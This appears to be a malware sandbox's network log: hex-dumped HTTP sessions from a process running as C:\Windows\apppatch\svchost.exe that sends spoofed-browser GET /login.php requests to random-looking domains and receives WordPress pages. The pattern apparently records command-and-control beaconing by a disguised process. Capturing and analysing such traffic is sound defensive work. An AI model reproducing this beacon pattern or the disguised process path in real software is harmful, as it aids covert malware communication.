                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4jZP%2Bi4gO9cxDFlQTghfu8eZWQaOEn4J7YzW7gHt2sYZJJgatUxEa0cg3Tu0JD8%2F2hc635bqvIzijXW1Cj8pMACoiOAYEG5fj2hedUpXkoZvvzc8nvAStVTvhkz3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e100760285c36c3-YYZ
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=12197&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=236543&cwnd=76&unsent_bytes=0&cid=3e04c6c75e3a395b&ts=1506&x=0"
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC284INData Raw: 37 63 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                              Data Ascii: 7c20<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69
                                                                                                                                                                                                              Data Ascii: "UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!i
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62
                                                                                                                                                                                                              Data Ascii: touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visib
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a
                                                                                                                                                                                                              Data Ascii: important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-type):
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e
                                                                                                                                                                                                              Data Ascii: layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66
                                                                                                                                                                                                              Data Ascii: ne!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;lef
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65
                                                                                                                                                                                                              Data Ascii: .i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-e
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61
                                                                                                                                                                                                              Data Ascii: important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!importa
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73
                                                                                                                                                                                                              Data Ascii: n!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion{dis
                                                                                                                                                                                                              2024-11-11 17:33:43 UTC1369INData Raw: 72 64 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 6c 79 73 79 76 61 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 31 32 2f 63 72 6f 70 70 65 64 2d 53 75 6b 73 65 73 2d 46 61 76 69 63 6f 6e 2d 32 37 30 78 32 37 30 2e 70 6e 67 22 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 3d 22 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6d 6a 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f
                                                                                                                                                                                                              Data Ascii: rd"><meta name="msapplication-TileImage" content="https://lysyvan.com/wp-content/uploads/2023/12/cropped-Sukses-Favicon-270x270.png"><script async="" src="https://cdn.ampproject.org/v0.mjs" type="module" crossorigin="anonymous"></script><script async nomo


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              10192.168.2.857738188.114.96.34437652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-11 17:35:04 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyhig.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC954INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:35:04 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                              link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJiUugFuator45Efysh1gibMhXPmo%2Bb6HH0jrBTYky%2BIRwCHsgl5%2By%2B3h%2BPW45sBDx9zPR%2Fcv5Uc8OzwuOUZD0PmzkdBGAmAjLLpEBxhS3vI6xeREDxjlzLrj8pmfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                              CF-RAY: 8e1009630817422f-EWR
                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1236&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2464680&cwnd=251&unsent_bytes=0&cid=60d719d5bbb6fb72&ts=1355&x=0"
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC415INData Raw: 37 63 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                              Data Ascii: 7ca4<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 31 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61
                                                                                                                                                                                                              Data Ascii: </style><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v21.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found -</title><meta property="og:locale" content="en_US" /><meta
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61
                                                                                                                                                                                                              Data Ascii: unction c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.ca
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53
                                                                                                                                                                                                              Data Ascii: fined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JS
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66
                                                                                                                                                                                                              Data Ascii: }).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minif
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 2e 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66
                                                                                                                                                                                                              Data Ascii: .site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;f
                                                                                                                                                                                                              2024-11-11 17:35:05 UTC1369INData Raw: 65 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76
                                                                                                                                                                                                              Data Ascii: e]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
